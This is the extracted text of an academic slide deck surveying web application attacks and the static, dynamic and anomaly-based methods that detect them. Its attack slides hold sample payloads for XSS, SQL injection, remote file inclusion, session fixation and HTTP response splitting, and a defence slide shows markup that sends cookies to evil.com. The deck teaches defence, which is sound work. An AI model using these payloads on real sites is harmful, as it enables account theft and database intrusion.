Upload
maude-norton
View
215
Download
0
Embed Size (px)
Citation preview
2
Outline
1. Current web security trend2. Web Technologies3. Web based attacks4. Vulnerability Analysis5. Conclusion
web security
As web applications for critical services has increased, attacks against web has grown as well. A series of characteristics make it a valuable for an attacker. web applications are often designed to be widely
accessible Web applications often interface with back-end
component containing sensitive data most popular web languages are currently easy enough
to allow novices to start their own applications
3/50
Trend
In the first semester of 2005, Symantec cataloged 1,100 new vulnerabilities, which represent well over half of all new vulnerabilities, as affecting web-based applications.
4/50
A new statistic from white book of Symantec threaten report.
5
Outline
1. Current web security trend2. Web technologies3. Web based attacks4. Vulnerability Analysis5. Conclusion
Common Gateway Interface
One of the first mechanisms enabled dynamic content : Common Gateway Interface (CGI)
It defines a mechanism that a server can use to interact with external applications.
Disadvantage: requires to create a new process and executed for each request
Server-specific APIs: Low initialization cost and can perform more general
functionalities than CGI-based programs. complex when writing a program, it involves some
knowledge of the server’s inner workings.6/50
7/50
users to
authenticatetasks of parameter
decoding and
session manage
Embedded Web Application Frameworks
Today, most web application implementation is a middle way between original CGI and server specific APIs.
an interpreter or compiler used to encode the application’s components and define rules that govern the interaction between the server and the application’s components.
Web application frameworks are available for a variety of languages, such as PHP, Perl, and Python. (interpreted, object-oriented, loosely typed)
8/50
A sample PHP program
9/50
parameters of requests
through HTTP GET
method are available
in the $ GET array
native support
for sessions,
easy to keep track
different requests users input are
first checked using
the validate function
10
Outline
1. Current web security trend2. Web technologies3. Web based attacks4. Vulnerability Analysis5. Conclusion
Attacks
Web-based applications have fallen prey to a variety of different attacks that violate different security properties.
This survey focuses on attacks behave in unforeseen ways to disclose sensitive information or execute commands on behalf of the attacker.
Currently, most of attacks against web applications can be ascribed to one class of vulnerabilities: improper input validation.
11/50
Interpreter Injection
Many dynamic languages include functions to dynamically compose and interpret code. include and require - Includes and evaluates a file as
PHP code. eval, preg_replace - Evaluates a string as PHP
code. exec, passthru, system, popen, shell_exec, popen,
pcntl_exec, proc_open and the backtick - Executes its input as a shell command.
Attack on the server
12/50
Sample of interpreter injection in Double Choco Latte
13/50
url
Server without fully filtering the parameter of menuAction
Filename Injection
Most languages of web are allowed to dynamically include files to interpret content or present them to users.
E.g. to generate different page content depending on user’s preferences, such as for internationalization purposes.
Because PHP allows for the inclusion of remote files, the code to be added to the application can be hosted on a site under the attacker’s control.
14/50
a filename injection vulnerability in txtForum
In txtForum, pages are divided in parts, e.g., header, footer, forum view, and can be customized by using different “skins,” which are different combination of colors, fonts, and other presentation parameters.
Skin with value http://[attacker-site] leads to the execution of the code at http://[attacker-site]/header.tpl
15/50
Script Cross-site attack ( XSS) In the attack, an attacker forces a client, typically a web browser, to execute attacker-
supplied executable code, typically JavaScript code, which runs in the context of a trusted web site.
Sample:
http://www.vulnerable.site/welcome.cgi?name=<script>alert(document.cookie)</script>
16/50
Impact of XSS-Attacks
Access to authentication credentials for Web application Cookies, Username and Password
XSS is not a harmless flaw ! Normal users
Access to personal data (Credit card, Bank Account) Access to business data (Bid details, construction
details) Misuse account (order expensive goods)
High privileged users Control over Web application Control/Access: Web server machine Control/Access: Backend / Database systems
17
SQL Injection
A web-based application has an SQL injection vulnerability when it uses unsanitized user data to compose queries that are later passed to a relational database for evaluation.
This can lead to arbitrary queries being executed on the database with the privileges of the vulnerable application.
$activate = $_GET [" activate "];
$result = dbquery (" SELECT * FROM new_users " ,
" WHERE user_code =’ $activate ’");
18/50
where the activate parameter is set to the string ’ OR 1=1 -- the query will return the content of the entire new users table.
SELECT * FROM new_users WHERE user_code =‘ ‘ OR 1=1
SQL Injection
19/50
Session Hijacking
HTTP is a stateless protocol, no built-in mechanism allows application to maintain state throughout a session.
The session state can be maintained in different ways. It can be encoded in a document transmitted to the user in a
way, such as cookie or HTML hidden form fields and sent back as part of later requests.
Problem: the cookie or hidden forms may be changed by dishonest users.
each user is assigned a unique session ID Problem: Session fixation
20/50
Session Hijacking
Session fixation: the attacker sets a user's session id to one known to him,
for example by sending the user an email with a link that contains a particular session id.
http://[target]/login.php?sessionid=1234
21/50
Response Splitting
the attacker is able to set the value of an HTTP header field, and the resulting response stream is interpreted by the attack target as two responses
To perform response splitting the attacker must be able to inject data containing the header termination characters and the beginning of a second header.
This is usually possible when user’s data is used (unsanitized) to determine the value of an HTTP header
22/50
Response Splitting
<% response.sendRedirect (“/by_lang.jsp?lang =" +
request. getParameter (" lang "));%>
Location: http://vulnerable.com/by_lang.jsp?lang=en_US.
However, if the lang=dummy%0d%0a
Content-Length:%200
%0d%0a%0d%0a
HTTP/1.1%20200%20OK%0d%0a
Content-Type:%20text/html%0d%0a
Content-Length:%2019%0d%0a%0d%0a
<html>New document</html> 23/50
Response Splitting
Response Splitting often related to the attack of web cache poisoning
Two condition: a caching proxy server interprets the response
stream as containing two documents associates the second one with the original
request, then an attacker would be able to insert in the
cache of the proxy a page of his choice in association to a URL in the vulnerable application.
24/50
25
Outline
1. Current web security trend2. Web technologies3. Web based attacks4. Vulnerability Analysis5. Conclusion
Vulnerability analysis
vulnerability analysis refers to the process of assessing the security of an application through auditing of either the application’s code or the behavior for possible security problems.
The identification of vulnerabilities in web applications can be performed following one of two orthogonal detection approaches: the negative (vulnerability based) approach and the positive (behavior based) approach.
26/50
Detection approach
Negative approach: builds abstract models of known vulnerabilities and then matches the models against web-based applications, to identify instances of the modeled vulnerabilities.
Positive approach: builds models of the normal behavior of an application (eg. using machine-learning techniques) and then analyze the application behavior to identify any abnormality that might be caused by a security violation.
Two fundamental analysis techniques that can be used to do the analysis : static analysis and dynamic analysis.
27/50
Static analysis: provides a set of pre-execution techniques for predicting dynamic properties of the target program. it does not require the application to be deployed and executed.
Dynamic analysis: consists of a series of checks to detect vulnerabilities and prevent attacks at run-time. It is less prone to false positives, since the analysis is done on run-time.
In practice, hybrid approaches mixed both static and dynamic techniques, are frequently used to combine the strengths and minimize the limitations of the two approaches.
28/50
29
Outline
1. Current web security trend2. Web Technologies3. Web based attacks4. Vulnerability Analysis
1. Negative approach2. Positive approach
5. Conclusion
Negative approach: taint propagation
Most negative approaches assumes that vulnerabilities are the result of insecure data flow in applications.
We attempt to identify when untrusted user input propagates to security-critical functions(sinks) without being properly checked and sanitized.
taint propagation: data from input is marked as tainted and its propagation throughout the program is traced to check whether it can reach sinks.
30/50
Negative static Approaches
static analysis can be applied before the deployment. It does not require modification of the deployment environment.
Currently focus on the analysis of applications written in PHP and Java
It may require the source code of web site to do analysis.
31/50
WebSSARI (WWW’04)
WebSSARI (WWW’04) is one of the first works that applies taint propagation analysis in web security.
WebSSARI targets three types of vulnerabilities: cross-site scripting, SQL injection, and general script injection.
The tool uses flow-sensitive, intra-procedural analysis based on a lattice model and typestate. Typestate: PHP is extended with two types: tainted and
untainted, the tool keeps track the type-state of variables. In order to untaint the tainted data, the data has to be
processed by a sanitization routine or cast to a safe type.
32/50
It predefine 3 file: a file with preconditions to all sensitive functions (the sink) a file with of known sanitization functions, for untaited. a file specifying all possible sources of untrusted input
When the tool finds tainted data reaches sinks, it automatically inserts sanitization routines.
33/50
If (A) {
A=X;
} else {
if (B) {
A=Y;
} else {
A=Z;
}
}
Echo (A);
If (C) {
If (A)
If (B)
Echo(A)
A=Y;
A=X;
A=Z;
If (C)
A X Y Z
T T U T
A X Y Z
T T U T
Typestate
A X Y Z
U T U T A X Y Z
T T U T
A X Y Z
U T U T
T=LUB(T,U,T)
At every program point,
the algorithm keeps a
static invariant representing the most dangerous possible state at that point.
Control flow graph
If (A) {
A=X;
} else {
if (B) {
A=Y;
} else {
A=Z;
}
}
Echo (A);
If (C) {
If (A)
If (B)
Echo(A)
A=Y;
A=X;
A=Z;
If (C)
• Typestate offers a balance between precision and cost
• Maintains a typestate for every diverging path
– Increases precision
– Induces memory cost
• Merges typestate at execution merge points
– Limits memory cost
– Induces imprecision
– Denies counterexample support
• WebSSARI incorporates flow-sensitive typing based on typestate
TypestateIf (A)
If (B)
Echo(A)
A=Y;
A=X;
A=Z;
If (C) Control flow graph
36
Runtime Protection
Different sanitization routines are automatically inserted just before vulnerable function calls
Depending on the vulnerable function, one of the three following routines is inserted HTML output sanitization Database command sanitization System command sanitization
37
System Implementation
Problem of WebSSARI:
Uses intra-procedural algorithm and thus only models information flow not cross function boundaries. (Xie Usenix 06)
All dynamic variables, arrays are considered tainted, reduce the accuracy of the analysis.
Can not accurately tracking arrays, alias and object-oriented code. (Pixy Oakland 06 )
38/50
Summary
static analysis heavily depends on language specific parsers. It is not generally a problem for general purpose languages
Web applications use dynamic scripting languages to facilitate the use of complex data structures, such as arrays and hash, hard to track.
One main drawbacks of static analysis is its susceptibility to false positives caused by inevitable analysis imprecisions..
Precise evaluation of sanitization routines is more difficult. Just regular expression maybe not enough
39/50
Dynamic negative approach
Dynamic negative techniques is also based on taint analysis. Untrusted sources, sensitive sinks, and tainting propagates also need to be modeled
Instead of running analysis on source code, program or interpreter are extended to collect the information and the tainted data is tracked as execution.
Perl’s Taint mode: Perl interpreter is invoked with the –T option it makes sure that no data obtained from the outside environment can be used in security critical functions (too conservative)
40/50
“Automatically Hardening Web Applications Using Precise Tainting”, SEC’05
Propose modification of the PHP interpreter to dynamically track tainted data in PHP programs.
Fully automated Aware of application semantics Replace PHP interpreter with a modified
interpreter that: Keeps track of which information comes from
untrusted sources (precise tainting) Checks how untrusted input is used
41/50
HTTP Server
PHP Interpreter
1
8
2 3
4
5
File System
file.php
Database
Cli
ent
Web Server System APIs
67
PHPreventPHPrevent
Coarse Grain Tainting
Provided by many scripting languages (Perl, Ruby)
Untrusted input is tainted Everything touched by tainted data becomes
tainted
$query = "SELECT real_name FROM users WHERE user = '" . $user
. "'AND pwd = '"
. $pwd . "' ";Entire $query string is tainted
Precise Tainting
$query = "SELECT real_name FROM users WHERE user = '" . $user . "'AND pwd = '" . $pwd . "' ";$query = "SELECT real_name FROM users WHERE user = '' OR 1 = 1; -- ';'AND pwd = '' ";
• Untrusted input is tainted• Taint markings are maintained at character level
– Depends on semantics of program
• Only really tainted data is tainted
Precise Checking
Wrappers around PHP functions that handle updating and checking precise taint information
Conservative: no false negatives while minimizing false positives Behavior only changes when an attack is likely
Preventing SQL Injection
Parse the query using the SQL parser: identify interpreted text
Disallow SQL keywords or delimiters in interpreted text that is tainted Query is not sent to database Error response it returned
"SELECT real_name FROM users WHERE user = '' OR 1 = 1; -- ';' AND pwd = '' ";
Preventing PHP Injection
Disallow tainted data to be used in functions that treat input strings as PHP code or manipulate system state place wrappers around these functions to enforce
this rule phpBB attack prevented by wrappers around
preg_replace
Preventing Cross Site Scripting
Wrappers around output functions Buffer output and then parse the tainted output with HTML Tidy
Our defense takes advantage of precise tainting information to identify web page output generated from untrusted sources.
Dangerous content was determined by examining HTML grammar
Sanitize it by removing tags
<b>Hello</b> Safe<b onmouseover= 'location.href=
"http://evil.com/steal.php?" + document.cookie'>Hello</b> Unsafe
Summary of dynamic negative method
a modified interpreter can be applied to all web applications, all required information is available as execution result. Further, no complex analysis for features such as alias analysis is required.
However, no guarantees to all cases
49/50
Summary of negative method
If taint propagation is done statically, the precision highly depends on the ability of dealing the complexities of dynamic features. Precise evaluation of sanitization routines is especially important
If taint propagation analysis is done dynamically, on the other hand, issues of analysis completeness, application stability and performance arise.
50/50
51
Outline
1. Current web security trend2. Web Technologies3. Web based attacks.4. Vulnerability Analysis
1. Negative approach2. Positive approach
5. Conclusion
Positive Approaches
Based on deriving models of the “normal” behavior Assumption:
Deviations mean attacks or vulnerabilities; attacks create an anomalous manifestation;
an anomaly detection system utilizes a number of statistical models to identify anomalous events in a set of web requests that use parameters to pass values to the server-side components of a web-based application
52/50
Anomaly-based
Based on assumption that normal traffic can be defined
Attack patterns will differ from such ‘normal’ traffic Anomaly-based detection system will go through a
learning phase to register such ‘normal’ traffic Analysis will be done for individual field attributes
as well as for entire query string This difference should be able to be expressed
quantitatively
Anomaly Detection of Web-based Attacks Cristopher Kruegel & Giovanni Vigna CCS ‘03
it is hard to keep intrusion detection signature sets updated with respect to the large numbers of vulnerabilities discovered daily.
This paper presents an intrusion detection system that uses a number of different anomaly detection techniques to detect attacks against web servers and web-based applications.
The anomaly detection system takes as input the web server log files which conform to the Common Log Format and produces an anomaly score for each web request.
54/50
Data Model
Only GET requests with no header 169.229.60.105 − johndoe [6/Nov/2002:23:59:59 −0800 "GET
/scripts/access.pl?user=johndoe&cred=admin" 200 2122
Only Query string, no path For query q, Sq={a1,a2}
Path Query
a1=v1 a2=v2
Detection model
Each model is associated with weight wm.
Each model returns the probability pm.
A value close to 0 indicates anomalous event i.e. a value of pm close to 1 indicates anomalous event.
If the weighted score is greater than the detection threshold determined during the learning phase for that parameter, the anomaly detector considers the entire request anomalous and raises an alert.
Anomaly-based
Some of the attributes that could be analyzed are: Input length Character distribution Parameter string structure Parameter absence or presence Order of parameters
Attribute Length
Normal Parameters Fixed sized tokens (session identifiers) Short strings (input from HTML form) So, doesn’t vary much associated with certain prg.
Malicious activity E.g. for buffer overflow
Goal: to approximate the actual but unknown distribution of the parameter lengths and detect deviation from the normal
Learning & Detection
Learning Calculate mean and variance for the lengths l1,l2,...,ln for
the parameters processed. N queries with this attribute
Detection Chebyshev inequality
This computation bound has to be weak, to result in high degree of tolerance (very weak)
Only obvious outliers are flagged as suspicious
Attribute character distribution
Attributes have regular structure, printable characters There are similarities between the character frequencies of
query parameters. Relative character frequencies of the attribute are sorted in
relative order
Normal freq. slowly decrease in value
Malicious Drop extremely fast (peak cause by single character distrib.) Nearly not at all (random values)
Passwd – 112 97 115 115 119 110 0.33 0.17 0.17 0.17 0.17 0 255 times
ICD(0) = 0.33 & ICD(1) to ICD(4) = 0.17 ICD(5)=0
Why is it useful?
Cannot be evaded by some well-known attempts to hide malicious code in the string. Nop operation substituted by similar behavior (add
rA,rA,0)
But not useful in when small routine change in the payload distribution
Learning and detection
Learning For each query attribute, its character distribution is
stored ICD is obtained by averaging of all the stored
character distributions
.5 .25 .25 0 0
.75 .2 .1 0 0
.25 .25 .25 .25 0
.5 .22 .2 .08 0
q1
q2
q3
avg
Learning and detection (cont...)
Pearson chi-square test Not necessary to operate on all values of ICD
consider a small number of intervals, i.e. bins
Calculate observed and expected frequencies Oi= observer frequencies for each bin Ei= relative freq of each bin * length of the attribute
Compute chi-square Calculate probability from chi-square predefined
table
Structural inference
Structural is the regular grammar that describes all of its normal legitimate values.
Why?? Craft attack in a manner that makes its manifestation
appear more regular. For example, non-printable characters can be
replaces by groups of printable characters.
Learning and detection
Basic approach is to generalize grammar as long as it seems reasonable and stop before too much structural information is lost.
MARKOV model and Bayesian probability NFA
Each state S has a set of ns possible output symbols o which are emitted with the probability of ps(o).
Each transition t is marked with probability p(t), likelihood that the transition is taken.
Learning and detection (cont...)
Start
Terminal
a|p(a) = 0.5b|p(b) = 0.5
a|p(a) = 1
c|p(c) = 1
b|p(b) = 1
1.0
1.0
1.0
0.4
0.4
0.70.3
0.2
So, probability of ‘ab’
P(w) = (1.0*0.3*0.5*0.2*0.5*0.4)+
(1.0*0.7*1.0*1.0*1.0*1.0)
Learning and detection (cont...)
By adding the probabilities calculated for each input training element
Learning and detection (cont...)
Aim to maximize the product. Conflict between simple models that tend to over-
generalize and models that perfectly fit the data but are too complex.
Simple model- high probability, but likelihood of producing the training data is extremely low. So, product is low
Complex model- low probability, but likelihood of producing the training data is high. Still product is low.
Model starts building up and generating input data then the states starts building up using Viterbi algorithm.
Learning and detection (cont...)
Detection The problem is that even a legitimate input that has
been regularly seen during the training phase may receive a very small probability values
The probability values of all possible input words sum to 1
Model return value 1 if valid output otherwise 0 when the value cannot be derived from the given grammar
Token finder
Whether the values of the attributes are from a limited set of possible alternatives (enumeration)
When malicious user try to usually pass the illegal values to the application, the attack can b detected.
Learning and detection
Learning Enumeration: when different occurrences of
parameter values is bound by some threshold t. Random: when the no of different argument
instances grows proportionally Calculate statistical correlation
Learning and detection (cont...)
Detection If any unexpected happens in case of enumeration,
then it returns 0, otherwise 1 and in case of randomness it always return 1.
< 0, enumeration> 0, random
Attribute presence of absence Client-side programs, scripts or HTML forms pre-
process the data and transform in into a suitable request.
Hand crafted attacks focus on exploiting a vulnerability in the code that processes a certain parameter value and little attention is paid on the order.
Learning and detection
Learning Model of acceptable subsets Recording each distinct subset Sq={ai,...ak} of
attributes that is seen during the training phase.
Detection The algorithm performs for each query a lookup of
the current attribute set. If encountered then 1 otherwise 0
Attribute order
Legitimate invocations of server-side programs often contain the same parameters in the same order.
Hand craft attacks don’t
To test whether the given order is consistent with the model deduced during the learning phase.
Learning and detection
Learning: A set of attribute pairs O such that:
Each vertex vi in directed G is associated with the corresponding attribute ai.
For every query ordered list is processed. Att. Pair (as,at) in this list, with s ~= t and 1<=s,t<=i, a
directed edge is inserted into the graph from vs to vt.
Learning and detection (cont...)
Graph G contains all ordered constraints imposed by queries in the training data.
Order is determined by Directed edge Path
Detection Given a query with attributes a1,a2,...,ai and a set of
order constraints O, all the parameter pairs (aj,ak) with j~=k and 1 <= j,k <= I
Violation then return 0 otherwise 1
Conclusions of this paper
Anomaly-based intrusion detection system on web. Takes advantage of application-specific correlation
between server-side programs and parameters used in their invocation.
Parameter characteristics are learned from the input data.
Tested on Google, and two universities in US and Europe
Summary positive approaches
Advantage: By specifying normal behavior, it can detect unknown attack
Problem: the concept of normality is difficult to define vulnerable to mimicry attacks: detection threshold still
requires manual intervention and substantial expertise.
79/50
80
Outline
1. Current web security trend2. Web based attacks3. Vulnerability Analysis4. Conclusion
No method can be considered “the silver bullet”, many methods combine strengths from various techniques.
Important to provide techniques to better model sanitization and to assess whether a sanitization operation is appropriate for the task at hand
Challenges by novel web-specific attack techniques. Improper input validation are well-known and studied
There is no standard dataset usable as base-line for evaluation.
81/50
Future our work
To get some static and dynamic method specially support the XSS script code detection.
82/50
Thank you!
83